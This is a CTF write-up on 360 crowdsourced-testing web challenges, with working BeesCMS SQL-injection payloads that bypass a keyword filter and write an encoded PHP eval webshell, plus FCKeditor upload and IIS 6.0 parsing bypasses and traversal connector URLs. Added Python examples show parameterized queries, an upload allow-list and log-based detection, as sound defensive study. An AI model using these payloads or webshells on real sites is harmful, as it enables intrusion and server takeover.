360 crowdsourced testing (360众测) has been getting a lot of attention lately, and I heard many of the challenges come from this platform, so I made some time to work through a few!

Web Security

CMS Vulnerabilities

BeesCMS vulnerability analysis and tracing

Directory scan with Yujian (御剑):

Found the admin backend at /admin/login.php, which has a SQL injection.

For a detailed analysis see: https://www.cnblogs.com/yuzly/p/11423384.html

The CAPTCHA here is also flawed: a single CAPTCHA value can be reused any number of times. Adding a ' to the username field produces an error,

and the SQL statement is exposed in it:

select id,admin_name,admin_password,admin_purview,is_disable from bees_admin where admin_name='dsad'' limit 0,1

The vulnerability analysis shows that union, and and select are removed by string replacement, which can be bypassed like this:

union => uni union on
select => selselectect
and => a and nd

Entering the following as the username gives a working error-based injection:

admin ' a and nd extractvalue(1,concat(1,database()))%23

Next, try to write a shell. The input passes through htmlspecialchars, which can be bypassed with a hex literal or the CHAR() function (URL encoding does not seem to get through). into and outfile are filtered as well and can be bypassed like this:

outfile => outoutfilefile
into => in into

The final payload:

admin' uni union on selselectect 1,2,3,4,0x3c3f70687020406576616c28245f504f53545b315d293b3f3e  in into  outoutfilefile %27/var/www/html/moonback.php%27%23

Or:

admin' uni union on selselectect null,null,null,null,CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 49, 93, 41, 59, 63, 62)  in into  outoutfilefile %27/var/www/html/mb.php%27%23

The shell password is 1; connecting with AntSword (蚁剑) and reading /key.txt gives the key.
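As an added example (not the BeesCMS source and not the write-up's own code), the following Python models the two defects the analysis above relies on: a keyword blacklist that deletes each term once, so a nested form such as selselectect survives as select, and a query assembled from strings. It pairs that vulnerable lookup with a parameterized one over an in-memory SQLite table and adds a second-pass check that flags the nested-keyword trick for logging. The filter, table contents and payload are constructed for the demonstration; the real CMS regex has its own spacing rules, so this stand-in strips bare keywords and the nested forms used are selselectect and uniunionon rather than the spaced variants from the write-up.

```python
"""Added example, not BeesCMS code: a single-pass keyword blacklist is both
bypassable and lossy; a bound parameter removes the problem entirely.
The filter, table and payload below are constructed for the demonstration."""
import re
import sqlite3

BLACKLIST = ("union", "select", "and", "into", "outfile")

# Constructed attacker input. '--' is the comment marker here because SQLite
# has no '#' comments; the write-up's MySQL payloads use %23 for the same job.
DEMO_PAYLOAD = "nobody' uniunionon selselectect 7,'injected','x','y',0 -- "


def naive_filter(value: str) -> str:
    """Remove every blacklisted keyword once. The remnants are never
    re-scanned, so 'selselectect' collapses to 'select' and survives.
    It also damages legitimate input: 'Brandon' becomes 'Bron'."""
    for word in BLACKLIST:
        value = re.sub(word, "", value, flags=re.IGNORECASE)
    return value


def evasion_suspected(value: str) -> bool:
    """Detection hook: if a second run of the filter changes the result, the
    first pass reassembled a keyword from fragments. Log and reject such input
    instead of trying to filter harder."""
    once = naive_filter(value)
    return naive_filter(once) != once


def build_demo_db() -> sqlite3.Connection:
    """In-memory table shaped like the one named in the leaked query."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table bees_admin (id integer primary key, admin_name text,"
        " admin_password text, admin_purview text, is_disable integer)"
    )
    conn.execute("insert into bees_admin values (1, 'admin', 'hash-placeholder', 'all', 0)")
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """String-built query behind a blacklist: the shape the error message exposed."""
    sql = (
        "select id,admin_name,admin_password,admin_purview,is_disable"
        f" from bees_admin where admin_name='{naive_filter(username)}' limit 0,1"
    )
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Same query with a bound parameter: the input is data, never SQL text,
    so no keyword list is needed and nothing is mangled."""
    sql = (
        "select id,admin_name,admin_password,admin_purview,is_disable"
        " from bees_admin where admin_name=? limit 0,1"
    )
    return conn.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    db = build_demo_db()
    print(naive_filter("Brandon"))              # Bron
    print(evasion_suspected(DEMO_PAYLOAD))      # True
    print(lookup_vulnerable(db, DEMO_PAYLOAD))  # [(7, 'injected', 'x', 'y', 0)]
    print(lookup_safe(db, DEMO_PAYLOAD))        # []
```

The point of the second-pass check is not to make the blacklist safe (it cannot be), but to turn an evasion attempt into a detectable event while the query itself is fixed with parameters.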

Editor Vulnerabilities

Editor vulnerability analysis and tracing (question 1)

Reference: https://www.secpulse.com/archives/116338.html

Visiting the target, a hint says the editor lives in the /fckeditor/ directory.

Check the editor version information:

/fckeditor/editor/dialog/fck_about.html
/FCKeditor/_whatsnew.html

Test the upload points:

FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html

FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
FCKeditor/_samples/default.html
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php

Requesting a nonexistent path returns an IIS error page. At

fckeditor/editor/filemanager/connectors/test.html

uploading is possible.

The HTTP response headers show Microsoft-IIS/6.0. There are many bypass techniques for it, though it seems none is actually needed here.

1. Double-upload bypass

The '.' in the filename is rewritten to '_'.

After a file such as shell.asp;.jpg is uploaded, FCKeditor automatically renames it to shell_asp;.jpg. Uploading a file with the same name again produces shell.asp;(1).jpg.

2. Bypass by submitting shell.php followed by a space

Trailing spaces are only significant on Windows (Linux does not behave this way), so submitting shell.php followed by a space can bypass the filename restriction.

3. IIS 6.0 folder restriction bypass

Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

4. File parsing restriction

On the FCKeditor file upload page, create a folder such as 1.asp, then upload an image-format webshell into that folder to obtain a shell.

http://www.moonback.xyz/images/upload/201806/image/1.asp/1.jpg

On parsing vulnerabilities, see: https://www.secpulse.com/archives/3750.html

In the end, uploading something like shell.asp;jpg succeeds; on success the directory listing is returned, at:

/userfiles/file/shell.asp;jpg

Connect with AntSword and look for the flag.
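The four bypasses above all exploit the same design: the server accepts the client's filename and then tries to repair it (rewriting '.' to '_', appending '(1)' on a collision). As an added example, not FCKeditor's code, here is an allow-list validator in Python that rejects such names outright and chooses the stored name itself; it also validates NewFolderName and CurrentFolder so that a 1.asp folder and the ../../../ traversal seen in the connector URLs are refused. The extension sets and the upload root are illustrative choices, not values from the original page.

```python
"""Added example, not FCKeditor code: allow-list validation of upload names
and folder parameters instead of after-the-fact renaming. Extension sets
and the upload root used below are illustrative."""
import posixpath
import re
import secrets

ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}
# Extensions a classic IIS / PHP / JSP stack may execute; illustrative, not exhaustive.
SCRIPT_EXT = {"asp", "aspx", "asa", "cer", "cdx", "php", "phtml", "jsp", "jspx", "shtml"}
FOLDER_SEGMENT = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def allowed_extension(client_name: str) -> str:
    """Validate a client-supplied filename and return its lower-case extension.
    Raises ValueError for anything that is not a plain image name. The checks
    inspect the name as the file system would actually store it."""
    # Keep only the last path component under both separator conventions.
    name = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    # Windows strips trailing spaces and dots on save, so 'shell.php ' lands as
    # 'shell.php': normalise first, then validate the real on-disk name.
    name = name.rstrip(" .")
    if not name:
        raise ValueError("empty filename")
    # ';' (IIS 6 runs 'a.asp;b.jpg' as ASP), ':' (NTFS alternate data streams)
    # and control characters have no place in an upload name.
    if re.search(r"[;:\x00-\x1f\x7f]", name):
        raise ValueError("illegal character in filename")
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise ValueError("missing extension or stem")
    exts = parts[1:]
    # Every extension segment is checked, so 'shell.asp.jpg' is rejected too.
    if any(ext in SCRIPT_EXT for ext in exts):
        raise ValueError("script extension present")
    if exts[-1] not in ALLOWED_IMAGE_EXT:
        raise ValueError("extension not in allow-list")
    return exts[-1]


def accepts(client_name: str) -> bool:
    """Boolean wrapper around allowed_extension for quick checks."""
    try:
        allowed_extension(client_name)
        return True
    except ValueError:
        return False


def storage_name(client_name: str) -> str:
    """Server-chosen name: the client stem is discarded, which removes the
    '(1)' duplicate-suffix path and attacker-controlled names altogether."""
    return f"{secrets.token_hex(8)}.{allowed_extension(client_name)}"


def valid_folder_name(name: str) -> bool:
    """NewFolderName must be one plain segment: no dots, so '1.asp' or
    'shell.asp' folders cannot be created, and no separators."""
    return FOLDER_SEGMENT.match(name) is not None


def resolve_under_root(root: str, current_folder: str):
    """Resolve a client-supplied CurrentFolder beneath the upload root.
    Returns the absolute path, or None if it escapes the root or contains a
    segment that would not pass valid_folder_name."""
    root = posixpath.normpath(root)
    joined = posixpath.normpath(posixpath.join(root, current_folder.lstrip("/")))
    if joined != root and not joined.startswith(root + "/"):
        return None
    relative = joined[len(root):].strip("/")
    if relative and not all(valid_folder_name(seg) for seg in relative.split("/")):
        return None
    return joined
```

Note that allowed_extension deliberately discards any directory part of the filename (1.asp/1.jpg is judged as 1.jpg); the 1.asp directory itself is what valid_folder_name and resolve_under_root refuse, so the two checks must be applied together on the CreateFolder and upload paths.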

If you cannot find the directory, try:

1. Read the site directory from the XML response

http://www.-sec.org/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp

2. Get the current folder

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

3. Browse the C: drive

/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&Curre
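From the defender's side, the connector URLs and probe pages in this write-up are exactly what to look for in web server logs. The following Python is an added example, not part of the original post, that scans constructed log lines in a simplified W3C extended layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) and flags editor fingerprinting pages, CreateFolder calls with dotted folder names, CurrentFolder traversal and semicolons in served upload paths. The log lines, the field order and the alert threshold are constructed for the demonstration.

```python
"""Added example, not from the original post: flag FCKeditor connector abuse
in web server logs. Sample lines and field layout are constructed."""
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample in a simplified W3C extended layout:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status  ('-' = no query)
SAMPLE_LOG = """\
2019-09-01 10:00:01 203.0.113.9 GET /index.html - 200
2019-09-01 10:00:05 203.0.113.9 GET /fckeditor/editor/dialog/fck_about.html - 200
2019-09-01 10:00:09 203.0.113.9 GET /fckeditor/editor/filemanager/connectors/test.html - 200
2019-09-01 10:00:20 203.0.113.9 GET /fckeditor/editor/filemanager/connectors/aspx/connector.aspx Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp 200
2019-09-01 10:00:31 203.0.113.9 GET /fckeditor/editor/filemanager/connectors/aspx/connector.aspx Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ 200
2019-09-01 10:00:45 203.0.113.9 GET /userfiles/file/shell.asp;jpg - 200
2019-09-01 10:01:00 198.51.100.7 GET /userfiles/image/201806/photo.jpg - 200
"""

# Version and upload-test pages listed in the write-up; hits are fingerprinting.
PROBE_PAGES = ("fck_about.html", "_whatsnew.html", "test.html", "uploadtest.html")
CONNECTOR_RE = re.compile(r"/filemanager/(?:browser/default/)?connectors/")


def analyse_fck_log(log_text: str) -> list:
    """Return (client_ip, reason, request) tuples for FCKeditor abuse patterns."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 7:
            continue  # differently shaped line: skip rather than guess
        _date, _time, client, _method, stem, query, _status = fields
        low = stem.lower()
        if CONNECTOR_RE.search(low) and query != "-":
            # Connector calls are keyed on Command; parse_qs yields lists per key.
            params = {k.lower(): v[0] for k, v in parse_qs(query).items()}
            request = f"{stem}?{query}"
            if params.get("command", "").lower() == "createfolder":
                folder = params.get("newfoldername", "")
                # A legitimate folder name never needs a dot or a separator.
                if "." in folder or "/" in folder or "\\" in folder:
                    findings.append((client, "CreateFolder with dotted or path-like folder name", request))
            if ".." in params.get("currentfolder", ""):
                findings.append((client, "CurrentFolder traversal", request))
        elif low.endswith(PROBE_PAGES):
            findings.append((client, "editor version/upload probe page", stem))
        elif "/userfiles/" in low and ";" in low:
            # IIS 6 treats 'x.asp;y.jpg' as ASP; a served path with ';' is a red flag.
            findings.append((client, "semicolon in served upload path", stem))
    return findings


def flagged_clients(log_text: str, threshold: int = 2) -> list:
    """Client addresses with at least `threshold` findings, sorted."""
    counts = Counter(client for client, _reason, _request in analyse_fck_log(log_text))
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for client, reason, request in analyse_fck_log(SAMPLE_LOG):
        print(client, reason, request)
    print(flagged_clients(SAMPLE_LOG))  # ['203.0.113.9']
```

The threshold keeps a single stray hit on a file named test.html from paging anyone; the sequence fingerprint page, upload test page, CreateFolder with a dotted name and a semicolon path from one address is the pattern worth an alert.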
